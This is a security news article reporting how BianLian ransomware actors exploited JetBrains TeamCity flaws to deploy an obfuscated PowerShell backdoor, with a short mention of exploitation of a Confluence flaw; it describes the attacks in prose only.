BianLian Threat Actors Utilize JetBrains TeamCity Vulnerabilities in Ransomware Assaults
March 11, 2024
BianLian ransomware actors have been identified exploiting security vulnerabilities in JetBrains TeamCity software to execute their ransom-focused attacks. GuidePoint Security's fresh report, which came in response to a recent breach, reveals that the incident was initiated with the exploitation of a TeamCity server, leading to the deployment of a PowerShell implementation of BianLian's Go backdoor.
BianLian came into existence in June 2022, and following the release of a decryptor in January 2023, it has shifted its focus exclusively towards exfiltration-based extortion. GuidePoint Security observed an attack chain which starts with the exploitation of a susceptible TeamCity instance using either CVE-2024-27198 or CVE-2023-42793 to gain initial access. This is followed by the creation of new users in the build server and the execution of malicious commands for post-exploitation and lateral movement. It remains uncertain which of the two vulnerabilities were utilized by the threat actor for infiltration.
Known for their custom backdoor written in Go, tailored to each victim, the BianLian actors also drop remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. Microsoft has tracked this backdoor as BianDoor. Justin Timothy, Gabe Renfro, and Keven Murphy, security researchers, stated, 'After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor.'
The obfuscated PowerShell backdoor, referred to as 'web.ps1', is designed to create a TCP socket for further network communication to a server controlled by the actor, permitting the remote attackers to perform arbitrary actions on an infected host. The researchers added, 'The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives.'
The revelation comes as new proof-of-concept (PoC) exploits for a critical security flaw affecting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) have been detailed. This flaw could lead to remote code execution in a fileless manner and load the Godzilla web shell directly into memory. Over the past two months, this flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access trojans, indicating broad exploitation in the wild.
Related News
- Stealthy Exploits Target Atlassian Confluence: In-Memory Web Shells Deployed
- CISA Highlights Active Exploitation of JetBrains TeamCity Software Vulnerability
- Massive Exploitation of TeamCity Auth Bypass Vulnerability Leads to Creation of Admin Accounts
- Widespread Exploitation of Critical TeamCity Flaw to Create Admin Accounts
- Critical Vulnerabilities in TeamCity Pose Threat to Software Supply Chain
Latest News
- Magnet Goblin Exploits 1-Day Vulnerabilities with New Linux Variant of NerbianRAT Malware
- US CISA Systems Breached: Cybersecurity Measures Under Review
- Critical Vulnerability in Fortinet Systems Could Affect 150,000 Devices
- QNAP Alerts Users about Critical Authentication Bypass Vulnerability in NAS Devices
- Stealthy Exploits Target Atlassian Confluence: In-Memory Web Shells Deployed
Like what you see?
Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.